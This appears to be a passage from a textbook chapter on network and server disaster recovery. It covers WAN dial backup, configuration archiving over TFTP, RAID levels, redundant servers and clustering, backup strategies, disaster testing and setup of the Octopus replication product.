This configuration has three electronic devices, as well as a network circuit that is not under your control—all capable of interrupting Internet service. The electronic devices are not exactly components you can replace by running down to the local Radio Shack. The WAN circuit is controlled by your local exchange carrier, so the response time you receive to problems may be directly affected by the business relationship you have with the local exchange carrier. (Translation: "The more money you spend on a monthly basis, the more likely you are to see a service tech by the end of the millennium.")
While these issues may not be a big deal for some organizations, many do rely on Internet connectivity as part of their daily business practices. It is possible that when Internet connectivity was first established, consistent access to Internet services may not have seemed important or been considered a critical business function. Now that Internet access has become a critical business function, no one has gone back to evaluate the impact of the loss of this service.

So you need to go back to your risk analysis and identify your single points of network failure. You also need to evaluate the effect that loss of service will have on your organization. If any point in your network can be considered critical, you need to build in redundancy.

Consolidated Equipment

In the early 1990s, chassis hubs became extremely popular due to their high port density and single point of management. It was not uncommon to have 200 or more systems connected through a single hub. Of course, neither was it uncommon to have 200 or more users who were unable to access network resources because a power supply or a single management board had failed. This is why many organizations have stuck with stackable hubs; although these require more rack space, the failure of a single unit does not bring down an entire network.

There has been a resurgence of interest in consolidated solutions with the release of Cisco's 5000 series switch, as well as multiple product offerings from Cabletron. Like their chassis hub predecessors, these products claim lower administration costs due to a central point of management. While there is validity in this claim, it does not speak to the financial loss caused by a catastrophic failure of a single device.

Stackable solutions provide you with more flexibility in recovering from a failure. For example, if you are using six stackable switches instead of a single consolidated unit and one of these switches fails, you will not experience a complete network outage. Although you still have a failed device to deal with, you at least have some breathing space. You can use the remaining five units in order to continue providing services to important users such as your boss (if the outage coincides with your review), the person who cuts the weekly payroll, and that administrative assistant who drops off brownies every holiday.

Taking Advantage of Redundant LAN Routes

As you saw in Chapter 3, dynamic routing can be used to take advantage of multiple paths between network segments. Some routing protocols will even take such metrics as network utilization into account when determining which path is the best route along which to forward your traffic.

While static routes are your best bet when only a single path is available (such as a WAN link) or in areas where you are concerned that an attacker may corrupt the routing table (such as an Internet connection), for the majority of your internal network you should use a dynamic routing protocol such as OSPF. If there is only one connection point between each of your routed segments, consider purchasing another router for redundancy or adding more network cards to one of your servers. Using metrics such as hop count and cost, you can configure your network to route through the server only in case of emergency. This will help to insure that the server does not experience additional load unless the primary router fails.

Dial Backup for WAN Connections

WAN connections are prime candidates for providing a single point of failure. Due to the recurring costs of maintaining a WAN link, most organizations do not build any type of redundancy into their wide area network. This is a shame, because you have no real control over this portion of your network. You are at the mercy of your exchange carrier to feel your urgency and rectify the problem as soon as possible.

One potential solution is to configure your border routers to fail over to a backup circuit if the primary line fails. This backup can be an analog dial-up line along with a couple of modems, or you could go for increased bandwidth by utilizing an ISDN solution. In either case, you will have a lot less available bandwidth if the line that fails is a full T1, but you are better off being able to provide a minimal amount of bandwidth between your two locations than no bandwidth at all.
Configuring a router to perform dial backup is not difficult. The following example shows the commands required for a Cisco router to bring up an ISDN connection on bri 0 when the primary circuit on serial 0 fails to respond:

interface serial 0
 backup delay 10 120
 backup interface bri 0
 ip address 192.168.5.1 255.255.255.0
!
interface bri 0
 ip address 192.168.6.1 255.255.255.0
 dialer string 5551212
 dialer-group 1
 dialer in-band
!
dialer-list 1 protocol ip permit

This configuration tells the router that if serial 0 fails to respond for 10 seconds, the bri 0 interface should be brought up as an alternate path. Likewise, if the serial 0 circuit returns to operation for a minimum of 120 seconds, the bri 0 line should be torn down. The dialer-list command identifies the type of traffic that can bring up the alternate circuit path. In this case, we have specified that any IP traffic is capable of initiating the circuit.

Tip: If you are using ISDN as a backup solution, and you are using a primary rate ISDN (PRI) interface at your main office in order to accept basic rate ISDN (BRI) connections from multiple field offices, remember that the call will have to be initiated from the BRI side of the circuit.

Saving Configuration Files

All of the network disaster solutions we've discussed until now have dealt with availability of service. As mentioned earlier in this chapter, no disaster recovery solution is complete unless you are able to restore lost information, as well. In this case, we are not talking about your data that is traveling along the network. Protocols do a very good job of insuring that this information does not become lost. The real concern is the configuration files that you use to program routers, switches, and even hubs along your network.

When a network device fails, chances are you will also lose the configuration that has been programmed into it. It is also possible that someone may inadvertently change the configuration to an unusable state. If either of these events occurs, it is a good thing to have a backup of your configuration file so that the original setup can be restored. This is also useful for historic purposes, when you wish to see what changes have been made to your network and when.

Terminal Logging

The easiest way to save your configuration information is terminal logging. Most terminal emulation and telnet programs have some method of recording all the information that passes by on the terminal screen. If your networking device has a single command that shows all configuration information, you can use terminal logging to archive this information for later retrieval.

Some devices, such as Cisco routers and switches, will let you paste this information to your terminal screen in order to configure the device. For example, the write term command will display all configuration information on the terminal screen, allowing the configuration to be easily saved. If the device should fail later, simply open a terminal session with the new device and place it in configuration mode. Copy the original configuration of the original device to your Clipboard (using Notepad or WordPad), and paste it into the terminal screen connected to the new device.
Save the configuration, and your replacement is ready for action.

The drawback to terminal logging is that it only works for configuration; you cannot save the operating system. Also, if your network device does not provide a single command for displaying all configuration information, the process of recording the full configuration can be tedious.

Trivial File Transfer Protocol (TFTP) Server

Trivial File Transfer Protocol (TFTP) is similar to FTP, except that it uses UDP as a transport and does not use any type of authentication. When a client wishes to retrieve a file from a TFTP server or save a file to a TFTP server, it simply needs to know the file's name and the IP address of the TFTP server. There are no command parameters that allow you to authenticate or even change to a new directory.

Given the lack of authentication, TFTP is not exactly something you want coming through your firewall. Most networking devices, however, support TFTP for saving or retrieving configuration information. A single TFTP server can archive configuration files for every device on your network. If a device on your network fails, simply plug in its replacement, assign an IP address, and use TFTP to retrieve the required configuration file.

Tip: Most vendors use TFTP in order to configure devices with their latest operating system versions. This means that you can keep a known-to-be-stable operating system version on the TFTP server with the required configuration file. When a device needs to be replaced, simply use TFTP to load both the operating system and the configuration file from the TFTP server.

By saving the configuration information from your network devices, you can be assured of recovering from a network disaster as quickly as possible. Few things in life are a greater letdown than having a network device fail and finally receiving the replacement, only to discover that you do not remember the configuration of the original device and will have to spend the next few hours playing trial-and-error.
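TFTP's simplicity is easy to see at the protocol level: a read request is a single UDP datagram carrying an opcode, a filename, and a transfer mode, with no credentials anywhere. The sketch below is a minimal TFTP read client written directly against UDP sockets purely for illustration; the server address and filename at the bottom are placeholders, and for an actual configuration archive you would use an established TFTP server package rather than code like this.

import socket
import struct

def tftp_get(server, filename, port=69):
    # Note what is missing here: any form of authentication. All the
    # protocol requires is a filename and the server's IP address.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)
    # Read request (opcode 1): filename and transfer mode, NUL-terminated.
    rrq = struct.pack("!H", 1) + filename.encode() + b"\x00octet\x00"
    sock.sendto(rrq, (server, port))
    data = b""
    while True:
        packet, addr = sock.recvfrom(4 + 512)
        opcode, block = struct.unpack("!HH", packet[:4])
        if opcode == 5:                      # ERROR packet
            raise IOError(packet[4:-1].decode())
        if opcode == 3:                      # DATA packet
            data += packet[4:]
            # Acknowledge the block (opcode 4) to the server's reply port.
            sock.sendto(struct.pack("!HH", 4, block), addr)
            if len(packet) - 4 < 512:        # a short block ends the transfer
                return data

# Placeholder example: fetch a router's archived configuration.
# config = tftp_get("192.168.1.10", "router1-confg")

The same lack of authentication that makes this code so short is the reason you want your TFTP server kept well away from the untrusted side of your firewall.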
Server Disasters

Now that you have seen how to make your network more fault tolerant, it is time to consider your servers. There is a wide range of options available for making servers more disaster resistant. The only limiting factors are your budget and, in some cases, your operating system—not all solutions are available for every platform. Disaster prevention on a server is usually viewed as being the most costly, as we can typically only justify the expenditure on a single system.

Uninterruptible Power Supply (UPS)

While all computers need a source of clean and steady power, this is even more important when the computer will act as a server, because multiple users will rely on the system. A good power source is not just one that is free from blackout or brownout conditions; it should be free of surges and spikes, as well.

As little as a 10 percent fluctuation in power can cause an error condition on a computer—even less if the fluctuation takes the form of a steady stream of noise. While brownouts and blackouts are easy to identify because they will cause the system to reboot, spikes, surges, and noise can cause far more subtle problems, such as random application errors. Electrical power is like network wiring: we do not think to check it until we have spent time chasing our tails replacing drivers and loading patches.

Tracking Down Power Problems

I was once called in by a client to troubleshoot a problem with some backup software on a NetWare server. The backup software appeared to be hanging the server and causing 100 percent CPU utilization. The problem was not completely consistent: it happened during random stages of the backup process. What was odd, however, was that it only happened on Monday and Thursday nights between 7:30 PM and 8:00 PM, even though the client ran the backup every night. The problem could not be reproduced during regular business hours. Installing all current patches had no effect.

I decided to work late one Thursday night to see if I could diagnose the problem. At 7:00 PM, the cleanup crew came in and started emptying wastebaskets and vacuuming the rugs. At approximately 7:40 PM, a member of the cleaning crew plugged a vacuum into an outlet just outside the server room.

All ran fine until the vacuum was powered off. The resulting power spike immediately caused a 100 percent CPU race condition on the server. I asked the employee if the crew vacuumed this office space every night and was told that while the crew emptied wastebaskets every night, they only vacuumed on Mondays and Thursdays. Needless to say, the client had a UPS installed by Monday—and the problem was solved.

Tip: While a good UPS is an excellent idea for any computer system, it should be considered critical equipment for your servers. An intelligent UPS will include software that can shut down the server if power is unavailable for a specific amount of time. This insures that your server does not come crashing down once the battery supply has run dry.

RAID

RAID, or redundant array of inexpensive disks, not only provides fault tolerance against hard disk crashes; it can also improve system performance. RAID breaks up or copies the data you wish to save across multiple hard disks. This prevents a system failure due to the crash of a single drive. It also improves performance, as multiple disks can work together to save large files simultaneously.

The process of breaking up data across multiple disks is referred to as striping. Depending on the level of RAID you are using, the system may also store parity information known as Error Correction Code (ECC). Some RAID systems are hot swappable, meaning you can replace drives while the computer is still in use, reducing downtime to zero.

RAID can be implemented as either a hardware or a software solution. With hardware RAID, the RAID controller takes care of all RAID functionality, making the array appear as a single logical disk to the operating system. Software RAID is program code that is either part of the existing operating system or available as add-on software. Software RAID is usually slower than hardware RAID because it requires more CPU utilization. Regardless of the solution you use, RAID classifications are broken up into different levels: RAID 0–RAID 5.

Note: There are classifications for RAID 6–RAID 10, but these are simply variations on the original six specifications.

RAID 0

RAID 0 is used strictly for performance gains and provides no fault tolerance. Instead of saving a file to a single disk, RAID 0 stripes the data across multiple hard drives.
This improves performance by letting the drives share the storage load—but it also increases the chance of failure, as any one disk crash will disable the entire array. Because of the lack of fault tolerance, RAID 0 is not widely used.

RAID 1

RAID 1 maintains a full copy of all file information on every disk, which is why RAID 1 is sometimes referred to as disk mirroring. If a single disk fails, each of the remaining disks has a full copy of the entire file system. This prevents a system crash due to the failure of any one disk. It also means that disk storage is limited to the size of a single disk. In other words, if you have two 4GB drives mirrored together, you only have 4GB of available storage, not 8GB.

A RAID 1 disk array will actually perform worse than a single-disk solution. This is because the disk controller must send a full copy of each file to every drive, which limits the speed of the array to that of the slowest disk. Novell developed a term for a variation on disk mirroring called disk duplexing. Disk duplexing functions in the same way as disk mirroring, except that multiple controller cards are used. This helps to eliminate some of the performance degradation, because each controller only needs to communicate with a single drive. Duplexing also helps to increase fault tolerance, because the system can survive not only a drive failure but a controller failure, as well.

RAID 2

RAID 2 is similar to RAID 5, except that data is striped to disk at the bit level rather than in blocks. Error correction is also used to prevent a single drive failure from disabling the array. The block mode data transfer used by other RAID specifications is far more efficient than the bit-level mode used by RAID 2. This causes RAID 2 to suffer from extremely poor performance, especially when dealing with multiple small files. Due to its poor performance, RAID 2 is not widely used.

RAID 3 and RAID 4

RAID 3 and RAID 4 are nearly identical specifications; the main difference is that RAID 3 stripes data at the byte level, while RAID 4 stripes it in blocks. Both dedicate a single disk to error correction and stripe the data across the remaining disks. In other words, in a four-disk RAID 4 array, disks 1–3 will contain striped data, while disk 4 will be dedicated to error correction. This allows the array to remain functional through the loss of a single drive.

The ECC is essentially a mathematical summation of the data stored on all the other hard drives. This ECC value is generated on a block-by-block basis. For example, consider the following math problem:

3 + 4 + 2 + 6 = 15

Think of all the values to the left of the equals sign as data that is stored to a specific block on each data disk in a RAID 4 array. Think of the total as the value stored to the same block on the parity drive. Now let's assume that disk 3 crashes and a file request is made of this group of blocks. The RAID array is presented with the following problem:

3 + 4 + ? + 6 = 15

As you can see, it is pretty easy to derive the missing value. While this requires a bit more processing, thus slowing down disk access slightly, the array can reproduce the missing data and return the file information. While this example is greatly simplified, it essentially shows how RAID levels 3–5 recover from a disk failure.
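Real arrays compute the parity with bitwise XOR rather than decimal addition, but the recovery logic is exactly the arithmetic shown above: combine the surviving blocks with the parity block, and the missing value falls out. Here is a minimal sketch; the block contents are invented for the example.

from functools import reduce

def parity(blocks):
    # XOR the corresponding bytes of every block together.
    return bytes(reduce(lambda a, b: a ^ b, column) for column in zip(*blocks))

# Three data disks plus one parity disk, as in a four-disk RAID 4 array.
disk1, disk2, disk3 = b"\x03", b"\x04", b"\x02"
parity_disk = parity([disk1, disk2, disk3])

# Disk 3 crashes. XORing the survivors with the parity block rebuilds it.
rebuilt = parity([disk1, disk2, parity_disk])
assert rebuilt == disk3

Because XOR is its own inverse, the same routine that generates the parity block also reconstructs a lost one, which is why the array can keep servicing file requests (a bit more slowly) while a drive is down.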
RAID levels 3 and 4 are where you start to see an improvement in performance over using a single disk. You also take less of a storage hit in order to provide fault tolerance. Since data is stored on all the disks but one, the total storage capacity of a RAID 3 or RAID 4 array is the total storage of all the disks minus the storage of one of them. In other words, if you have four 4GB drives in a RAID 4 configuration, you will have 12GB of available storage.

RAID 5

RAID 5 is similar to RAID 3 and RAID 4, except that all disks are used for both data and ECC storage. This helps to improve speed over RAID 3 and RAID 4, which can suffer from bottlenecks on the parity drive. It also helps to improve capacity, as you can use more than five drives in a RAID 5 array. Like RAID 3 and 4, the total storage capacity is the combined storage of all the disks minus one. RAID 5 is by far the most popular RAID solution after disk mirroring.

Redundant Servers

Server redundancy takes the concept of RAID and applies it to the entire computer. Sometimes referred to as server fault tolerance, server redundancy keeps one or more complete systems available to step in if the primary one crashes. It does not matter whether the crash is due to a drive failure, a memory error, or even a motherboard failure. Once the primary server stops responding to requests, the redundant system steps in to take over.

As shown in Figure 12.3, redundant servers typically share two communication channels. One is their network connection, while the other is a high-speed link between the two systems. Depending on the implementation, this link can be created using proprietary communication cards or possibly 100Mb Ethernet cards. Updates are fed to the secondary via this high-speed link. Depending on the implementation, these updates may simply be disk information or may include memory address information, as well.

Note: When memory address information is included, the secondary is capable of stepping in for the primary with no interruption in service.

Figure 12.3: A redundant server configuration

Not all redundant server solutions include a high-speed link. For example, Octopus, which is discussed at length at the end of this chapter, uses the server's network connection when exchanging information. Octopus does not require a high-speed link between the two systems. The benefit of using the existing network is that the secondary server can be located anywhere, even at a remote facility. Since the secondary server can be safely tucked away in another location that is miles away, the setup is far more resilient to facility-wide problems such as fire, lightning strikes, floods, or even cattle stampedes.

If you do not have a link between the two systems, memory information is not shared, and the secondary is not capable of stepping in immediately. A client request originally sent to the primary server would have to time out and be reset before it could be serviced by the secondary server. This adds a delay of a minute or two before the secondary is fully utilized. Another drawback is increased network utilization, because all information is shared over the network rather than over an isolated link between the two systems.

Server redundancy can be implemented at the operating-system level or as an add-on product.
Novell's SFT-III and Microsoft's Cluster Server (MSCS) are good examples of operating-system-level support for running redundant servers. There are also many third-party offerings from companies like Vinca, Network Integrity, and Qualix Group that are capable of adding redundant server support. The option you choose will depend on the features you are looking for. Each product supports redundant servers in a slightly different fashion.

Clustering

Clustering is similar to redundant servers, except that all systems take part in processing service requests. The cluster acts as an intelligent unit in order to balance the traffic load. From a client's perspective, a cluster looks like a single, yet very fast, server. If a server fails, processing continues, but with an obvious degradation in performance. What makes clustering more attractive than server redundancy is that your secondary systems are actually providing processing time; they do not sit idle waiting for another system to fail. This insures that you get the highest level of utilization from your hardware.

Linux Clustering

An excellent example of clustering is the Beowulf project at NASA's Goddard Space Flight Center (GSFC). Back in 1994, NASA's Center of Excellence in Space Data and Information Sciences (CESDIS) clustered 16 Linux systems together. All systems were based on the Intel 486DX4 100MHz chip, and the total cost of the cluster was less than $50,000. All communications between the clustered systems utilized a set of 100Mb Ethernet networks. The goal was an inexpensive alternative to the high-end workstations that were being used for Earth and space science applications.

The resulting cluster had a combined processing speed of 1.2 billion floating-point operations per second (1.2 Gigaflops) and up to eight times the disk I/O bandwidth of a conventional system. This placed the Linux cluster on par with supercomputers costing four to five times more.

Clustering is an excellent solution for boosting both fault tolerance and performance, and it is available for UNIX, VMS, and Microsoft NT and 2000.

Data Backup

Keeping a duplicate copy of your data has always been the best way to protect against disaster, corruption, or loss. Although traditional methods rely on tape, newer backup methods are starting to gain the attention of companies—including Internet-based backups that provide for offsite storage and a reduction in the in-house maintenance of backup equipment and procedures.

Tape Backup

The mainstay of most network administrators, tape backups are the method of choice for protecting or restoring lost, corrupted, or deleted information. All of the server-based options we have discussed so far have focused on maintaining or restoring the server as a service. None is capable of restoring that proverbial marketing file that was deleted over three months ago. Here is where tape backups come in: their strength is in safeguarding the information that actually gets stored on the server.

Note: The ability to restore files becomes even more important if you are using UNIX or Windows NT as a file server. Neither of these operating systems includes a utility for restoring deleted network files.

Most backup software supports three methods of selecting which files should be archived to tape.
These methods are
• Full backup
• Incremental backup
• Differential backup

Full Backups

As the name implies, a full backup is a complete archive of every file on the server. A full backup is your best bet when recovering from a disaster: it contains a complete copy of your entire file system, consolidated to a single tape or set of tapes. The only problem with performing a full backup is that it takes longer to complete than any other backup method. If you need to back up large amounts of information (say, 10GB or more), it may not be feasible to perform a full backup every night.

Incremental Backups

Incremental backups copy to tape only the files that have been recently added or changed. This helps to expedite the backup process by archiving only the files that have changed since the last backup was performed. The typical procedure is to perform a full backup once a week and incremental backups nightly. If you needed to rebuild your server, you would first restore the full backup and then every incremental backup created since the full backup was performed.

The one flaw in incremental backups is that they do not track deletions. This means you could potentially end up trying to restore more data than you have capacity for. For example, consider Table 12.1. Let's say you have a 12GB drive on which you are storing file information. At the beginning of the day on Monday, you have 10GB of files saved on this disk. In the course of the day, you add 1GB of file information. At the end of the day, you perform a full backup, which writes 11GB of data to tape.

Table 12.1: Storage Problems with Incremental Backups

Day         Storage Used   Files Added   Files Deleted   Saved to Tape
Monday      10GB           1GB           0GB             11GB
Tuesday     11GB           1GB           3GB             1GB
Wednesday   9GB            2GB           0GB             2GB
Thursday    11GB           1GB           3GB             1GB

You start the day on Tuesday with 11GB of the 12GB used for storage. In the course of the day, you add 1GB of files but delete 3GB in order to free up disk space. At the end of the day, you perform an incremental backup and save 1GB of new data to tape.

You start the day on Wednesday with 9GB of the 12GB used for storage. You add 2GB of files and perform an incremental backup, saving 2GB of data to tape. Thursday you save 1GB of data to disk but delete 3GB. You incrementally back up the 1GB of new data to tape. At the end of the day on Thursday, you have 9GB of the 12GB used for storage.

Friday morning you walk in and find that someone has performed a bit of housekeeping, deleting all the files from your 12GB drive. You immediately spark up your backup software and restore the full backup performed on Monday. You then load the Tuesday incremental tape and restore that, as well. No sooner does the Tuesday tape finish the restore process than you get an "out of disk space" error from the server. Despite the fact that you still have two tapes with 3GB of data to restore, you have no free space left on your 12GB drive.

The capacity problem in this example is typical of incremental backups. For this reason, most system administrators perform differential backups instead of incremental ones.

Differential Backups

A differential backup differs from an incremental backup in that it backs up all files that have changed since a full backup was last performed.
The reference point is always the last full backup, not the most recent nightly backup. For example, if you perform a full backup on Monday and then a differential backup every other night of the week, the differential backup performed on Thursday night will include all file changes from Tuesday through Thursday. This helps to reduce the chances of the capacity problem you saw in restoring incremental backups. While it is still possible to end up with more data on tape than drive capacity, this problem is far less likely to occur.

Another benefit of performing differentials over incrementals is that you only need to restore two tapes after a server crash. This not only expedites the process but also reduces the chance of failure. For example, look again at Table 12.1. With incremental backups, you would need to restore four tapes in order to retrieve all of your data. If differentials were performed, you would only have to restore two. This reduces your chances of running across a bad tape.

Tip: Tape backups are fine for tape storage periods of a year or less. If you need to archive information for a longer period of time, consider using some form of optical media or storing your tapes in a climate-controlled environment.
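The difference between the two methods comes down to the reference time used when deciding whether a file belongs on tonight's tape. The sketch below illustrates that selection using file modification times; the directory path and timestamps are placeholders, and commercial backup products generally track this through archive bits or backup catalogs rather than raw modification times.

import time
from pathlib import Path

def changed_since(root, reference_time):
    # Select every file under root modified after the reference time.
    return [p for p in Path(root).rglob("*")
            if p.is_file() and p.stat().st_mtime > reference_time]

# Placeholder timestamps: the weekly full backup ran Monday at 11:00 PM,
# and the most recent nightly backup ran Wednesday at 11:00 PM.
last_full = time.mktime((2001, 4, 2, 23, 0, 0, 0, 0, -1))
last_backup = time.mktime((2001, 4, 4, 23, 0, 0, 0, 0, -1))

# Incremental: only what changed since the last backup of any kind.
incremental_set = changed_since("/data", last_backup)

# Differential: everything changed since the last FULL backup, so each
# nightly tape grows, but a full restore never needs more than two tapes.
differential_set = changed_since("/data", last_full)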
Internet Backups

An alternative or addition to tape backups can be Internet backups. Part of a larger outsourcing movement, Internet backups are typically included in a larger service package of outsourced, remote management. Products such as Connected's Connected TLM will automatically and regularly copy encrypted data from an organization and store it offsite in a secure facility.

The advantages of Internet backups include

Low administrative overhead: Because local implementation and maintenance are usually limited to a small software package, Internet-based backups run seamlessly and without intervention or monitoring on behalf of the internal IT staff of an organization. Tapes do not need to be monitored for quality or deterioration, taken offsite, or secured.

Reduced risk: Because data is always stored offsite, there is never a fear of an onsite disaster permanently destroying data. Because data is not being stored on tape, the risk of losing control of proprietary or confidential data through theft or negligence is more controlled; no one can simply walk off with a backup tape.

There are some significant potential disadvantages with Internet backups, such as:

Speed: Even with a T1, backups can take a significant amount of time. Although there is an increasing trend of greater bandwidth availability, this pales in comparison to the rate of growth of corporate data. As an example, it could take 2–3 hours to back up a 450MB file over a T1 link.

Recoverability: The time it takes to restore data from an Internet backup is greater than that of a local backup, and not just because of the slower speed of the connection. Requesting the backup service, locating the data, and initiating the process add extra overhead to an already slow transfer rate.

Despite the disadvantages, some organizations are adding Internet backups as part of their overall data recovery solution, using the benefit of offsite storage as an additional guarantee against data loss.

Application Service Providers

Application Service Providers (ASPs) solve the problem of server failure and data loss in a unique way. All data services are outsourced, with only the end-user client application running locally within an organization. All data and services are hosted through the Internet. The ASP is then responsible for ensuring the availability and redundancy not only of the data, but also of the entire application itself.

Although this is still an emerging solution, it has become an ideal one for many smaller organizations that do not have the budget to maintain either an entire IT staff or a hardware/software infrastructure. Larger organizations that use one or two primary lines of business applications can also benefit from entering into tight relationships with ASPs.

The drawbacks of utilizing an ASP become obvious. Should the Internet connection fail, no recourse is available for an organization to get access to its applications or its data. Billing or service disputes with the ASP can mean that data is held hostage and continued business is stopped until the dispute is resolved.

Also, service alternatives are restricted to a single company. Switching between ASPs can be difficult, and the portability of data can be impossible, leaving an organization without critical assets.

Server Recovery

While tape backups are fine for protecting file information, they are not a very efficient means of recovering a server. Let's assume that you suffer a complete server failure and you need to rebuild the server on a new hardware platform. The steps to perform this task would include

1. Installing the server operating system
2. Installing any required drivers
3. Installing any required service packs
4. Installing any required hotfixes or security patches
5. Installing the backup software
6. Installing any required patches to the backup software
7. Restoring your last full backup tape
8. Restoring any incremental or differential tapes as required

This is obviously a very time-consuming and labor-intensive process. It would be a minor miracle if this server could be put into operation in anything less than a full day, especially if it is used to store a lot of data.

The alternative is to use a package specifically designed for server recovery. Typically, these packages will create a small number of boot disks along with an image of the server. The boot disks allow the system to be started without an operating system. The server recovery software will then access the previously created image and restore all the data to the server. Once the server reboots, it is back in operation.

Some vendors make server recovery products that will integrate directly with a backup solution. For example, the ARCServe product line from Computer Associates includes both a backup program and a server recovery program. If you are using ARCServe for performing your nightly backups, it makes sense to also obtain a copy of the ARCServe disaster recovery option, because the recovery option is capable of reading the ARCServe backup tapes. This allows the recovery program to automatically restore your server to the configuration it had during the last full backup. If you purchased a server recovery program from another vendor, you would have to maintain the image file separately to insure that it stays up to date.

The only drawback to a server recovery solution is that it saves the entire system as an image.
While this expedites both the backup and the restore process, it also means that you cannot access individual files. Even with a server recovery solution, you still need a regular backup solution to replace the occasional lost file.

Simulating Disasters

By now you should have quite a few ideas about how to make your network more fault resistant and how to recover from failures when they occur. It is not enough simply to implement a disaster solution; you must test and document your solutions as well. Testing is the only way to insure that the recovery portion of your plan will actually work. Documenting the process is the only way to insure that the correct procedure will be followed when disaster does occur.

Nondestructive Testing

Nondestructive testing allows you to test your disaster prevention and recovery plans without affecting the normal workflow of your operation. This is the preferred method of testing: you do not want to cause a disaster while trying out a potential solution. For example, 9:00 AM on a Monday morning is not the best time for the first test of the hot-swap capability in your server's drive array.

The Importance of Disaster Simulation

I cannot overemphasize the importance of testing your disaster recovery solution. I once consulted for a company that wanted to implement a facility-wide disaster recovery solution. In other words, the company wanted to insure that if the whole building went up in smoke, it could recover to a remote facility and be back in operation within 96 hours. It was expected that most of the data would be migrated to this other facility via backup tape, as the remote facility was also used for offsite tape storage.

Only when we simulated a disaster did we find one minor flaw. The DEC tape drive sitting on the main production server was incompatible with the tape drive on the replacement server. In fact, the tape drive on the production server was so old that we could not obtain a duplicate drive to read the tapes created by the production system. Had this been an actual failure, recovery would have taken a wee bit longer than 96 hours.

The solution was twofold:
• Replace the tape drive on the production server with a model identical to the one on the replacement server.
• Document that any future tape drive upgrades must be duplicated on both systems.

There are a number of ways you can implement nondestructive testing. The most obvious is to use alternative hardware to simulate your disaster. For example, you could take another server that is identical to your production server and try restoring your backups to this alternative system.

Not everyone has the luxury of redundant components at their disposal for testing recovery plans. If you're not one of the lucky ones, try to plan your testing around plant shutdowns or extended holidays. Although the last thing anyone wants to do is spend a long weekend simulating network outages, it is far preferable to experiencing an actual disaster. There is nothing worse than a server outage at 9:00 on a workday morning caused by a part that must be special-ordered. Simulating your disasters ahead of time helps to insure that you will be capable of a full recovery when an actual disaster does occur.
Document Your Procedures

The only thing worse than spending a long weekend simulating network outages is spending a long weekend simulating network outages and writing documentation. As networking staff levels continue to drop, it is hard enough to keep up with the day-to-day firefighting, let alone simulate additional disasters and document the findings. We all like to think that we have minds like a steel trap and that we will remember every last detail when an actual disaster does occur.

The fact is that the stress of trying to restore a lost service or deleted information can make the best of us a little sloppy. It is far easier to document the process when you can take your time and think things through with a clear head. When you are under pressure, it is far too easy to try a shortcut to get things done more quickly—only to find that your shortcut has made matters worse. Documenting the process when you are not under the gun to restore service allows you to write up a clear set of instructions to follow.

Octopus, from the Qualix Group, provides server-level fault tolerance by replicating shares and directories from a source NT server to a target. When a source server fails, the target can stand in for it so seamlessly that your end users may never know the difference.

Installing Octopus

Octopus must be installed on every system that will act as an Octopus target or an Octopus source. To begin the installation process, insert the CD into an NT server and launch the Setup executable. This produces the Site Select dialog box, shown in Figure 12.6, which prompts you for the Microsoft machine name of the system on which you wish to install Octopus. You can type in the server name (as I have done in the figure) or click the Get button to search the network for NT servers. The Network Sites section of the dialog box allows you to customize the amount of information that is reported during a Get. Once you have entered the correct server name, click Continue.

Figure 12.6: The Octopus Site Select dialog box

Tip: Using Get to search the network for NT servers is an extremely slow process. You should type in the server name directly whenever possible.

You are next prompted to select a path for the program and data files, as shown in Figure 12.7. These storage locations will be used only by the Octopus software, not by your mirrored shares and files. Later, when you identify which shares you wish to mirror, you will be able to select a destination on the target system. Once you have entered the file paths, click the Continue button.

Figure 12.7: The Install Paths dialog box

The final dialog box prompts you for your license key. You need to visit the Qualix Group Web site (www.octopustech.com) or contact the Qualix Group directly with your product's serial number in order to generate a license key. Once you have entered this key, the program files are copied to your hard drive and you are prompted to reboot the NT server.

Note: Remember that you must install a copy of Octopus on every server that will be acting as either a source or a target.

Configuring Octopus

When you log on to the 2000 or NT server and launch the Octopus icon, you are presented with the Octopus console shown in Figure 12.8. All share replication is configured from the Octopus source, so if you are not currently sitting at the source's console, you can connect to the source system by selecting Functions > Attach from the console menu. This produces the same Site Select dialog box you worked with during the product installation.
You can either type in the name of the Octopus source NT server you wish to connect to or use the Get button to search the network for NT servers that have Octopus installed. Once you select the source you wish to work with, the console becomes active for that system.

Figure 12.8: The Octopus console screen

Next you need to add a specification that identifies which information you wish to replicate and to which target it should be sent. Select Maintenance > Add Specification > Share from the Octopus console menu. This produces the Mirror Shares screen shown in Figure 12.9. You should first configure your system to replicate all share information.

Warning: Octopus can only mirror unique share names. This means that two Octopus sources sharing the same target must not have any shares with the same name. If they do, one of the shares will be disabled on the target system in order to avoid conflicts.

Figure 12.9: Replicating shares with the Mirror Shares screen

The Exclude Shares field allows you to specify certain shares that you do not wish to replicate. To save all shares except for the administrative shares, leave this option blank. The Target Site field allows you to identify the Octopus target where this share information will be saved. Finally, selecting the Synchronize check box causes this information to be immediately replicated to the target system. When all of your options are set, click the OK button.

You also need to identify which directories you wish to replicate. This is done by adding another specification, as shown in Figure 12.10. You can only specify one directory path per specification; if you need to replicate multiple directories, simply create additional specifications. Checking the Include Subdirectories box causes Octopus to replicate all directories located under the specified source directory.

Figure 12.10: Replicating files with the Select Source screen

You also need to specify a target system and a target directory. This should be the same target system that will hold the shares, but you can locate the directory information anywhere you choose. Once you have finished, click OK and add shares as required. Your Octopus console screen should now appear similar to Figure 12.11.

Figure 12.11: The Octopus console with directory specifications

The left panes of the Octopus console show that the Octopus source is set up to replicate to the target system LAB31. The green traffic lights tell you that these systems are still able to communicate with each other. Under the target systems, you can see all the specifications you have configured; in this example, we are replicating the labfiles directory. The right pane shows the current replication status of the specification highlighted in the top pane. In Figure 12.11, you can see that Octopus found and replicated 525 files within the labfiles directory.

Now that your file information is being replicated, you need to tell your Octopus systems how they should respond when a failure occurs. This is done by selecting Switch-Over > Source Options from the Octopus console screen. This displays the Source Options dialog box, as shown in Figure 12.12.
Figure 12.12: The Source Options window

The Timeouts tab allows you to set up communication parameters between the source and the target system. The settings in Figure 12.12 tell the source to transmit a heartbeat every 15 seconds. The target is configured not to assume that the source is offline unless 60 seconds pass without a heartbeat transmission. These settings help to insure that one or two lost packets do not trigger the fail over process.

If you click the IP Addresses to Forward tab, you can specify whether the target system should assume the IP address of the source system when it fails. You can even specify multiple network cards. This insures that systems that use DNS or WINS to locate the source system will be directed to the target system after a failure.

Note: Remember that the target can only assume the IP address of the source if the two systems are located on the same logical network.

